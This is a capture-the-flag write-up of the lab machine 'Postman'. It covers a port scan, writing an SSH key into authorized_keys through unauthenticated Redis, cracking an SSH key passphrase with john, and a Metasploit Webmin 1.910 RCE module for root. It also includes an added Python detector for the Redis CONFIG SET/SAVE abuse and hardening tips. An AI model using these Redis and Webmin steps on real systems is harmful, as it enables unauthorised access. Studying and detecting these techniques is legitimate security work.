Basic information

Port scan

A full port scan is needed; the open ports are 22, 80, 6379 and 10000:

nmap -p- -sC -sV 10.10.10.160

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Unauthenticated Redis

Redis has no authentication, so this is the usual trick of writing an SSH public key into the redis user's home, which is Redis's default directory:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > id_rsa-key.txt
cat id_rsa-key.txt | redis-cli -h 10.10.10.160 -x set miao

# redis
get miao
config set dir /var/lib/redis/.ssh
config set dbfilename authorized_keys
save
exit

Then SSH in as the redis user:
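As an added defender-side example (not part of the original write-up), the script below scans redis-cli MONITOR output for the sequence used above, CONFIG SET dir / CONFIG SET dbfilename followed by SAVE from one client; the sample lines and client addresses are constructed, not a real capture.

```python
import re
from collections import defaultdict

# One MONITOR line: <unix ts> [<db> <client ip:port>] "CMD" "arg1" ...
LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
TOKEN_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted tokens, backslash escapes allowed

# Constructed sample output (not a real capture): one client retargets the RDB
# dump into a .ssh directory and saves; a second client issues benign commands.
SAMPLE_MONITOR = """\
1655000001.000001 [0 10.10.14.5:41234] "set" "miao" "\\n\\nssh-rsa AAAAB3... user@box\\n\\n"
1655000002.000001 [0 10.10.14.5:41234] "config" "set" "dir" "/var/lib/redis/.ssh"
1655000003.000001 [0 10.10.14.5:41234] "config" "set" "dbfilename" "authorized_keys"
1655000004.000001 [0 10.10.14.5:41234] "save"
1655000005.000001 [0 127.0.0.1:50000] "get" "session:42"
1655000006.000001 [0 127.0.0.1:50000] "config" "get" "maxmemory"
"""

def parse_monitor_line(line):
    """Return (client, [tokens]) for a MONITOR line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group(3), TOKEN_RE.findall(m.group(4))

def find_rdb_write_abuse(monitor_text):
    """Flag clients that change dir/dbfilename via CONFIG SET and then SAVE/BGSAVE."""
    state = defaultdict(dict)   # client -> {"dir": ..., "dbfilename": ...}
    findings = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        client, tokens = parsed
        cmd = [t.lower() for t in tokens[:3]]  # command words are case-insensitive
        if cmd[:2] == ["config", "set"] and len(tokens) == 4 and cmd[2] in ("dir", "dbfilename"):
            state[client][cmd[2]] = tokens[3]
        elif cmd[:1] in (["save"], ["bgsave"]) and state[client]:
            findings.append({"client": client, **state[client]})
    return findings

if __name__ == "__main__":
    for f in find_rdb_write_abuse(SAMPLE_MONITOR):
        print(f"ALERT {f['client']} wrote RDB dump to {f.get('dir')}/{f.get('dbfilename')}")
```

The same pattern is absent from a hardened instance where `requirepass` is set, `protected-mode` is on, or `CONFIG` is disabled with `rename-command`.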

Enumeration

There is an id_rsa.bak in the /opt directory, an encrypted SSH private key:

Cracking with john

python /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

computer2008

user flag

The private key itself cannot be used to log in, but the cracked passphrase is also Matt's account password, so we can switch to that user and read user.txt from the home directory:

Webmin

Back to port 10000: accessing it directly says a hostname is required, so add a hosts entry:

10.10.10.160 Postman

The site is a Webmin instance:

The username and password are:

Matt : computer2008

exploit

Webmin 1.910 has a known vulnerability, and Metasploit has a module for it; note that SSL must be set to true:

use linux/http/webmin_packageup_rce

set SSL true

root flag

This gives a root shell, and root.txt is read:

References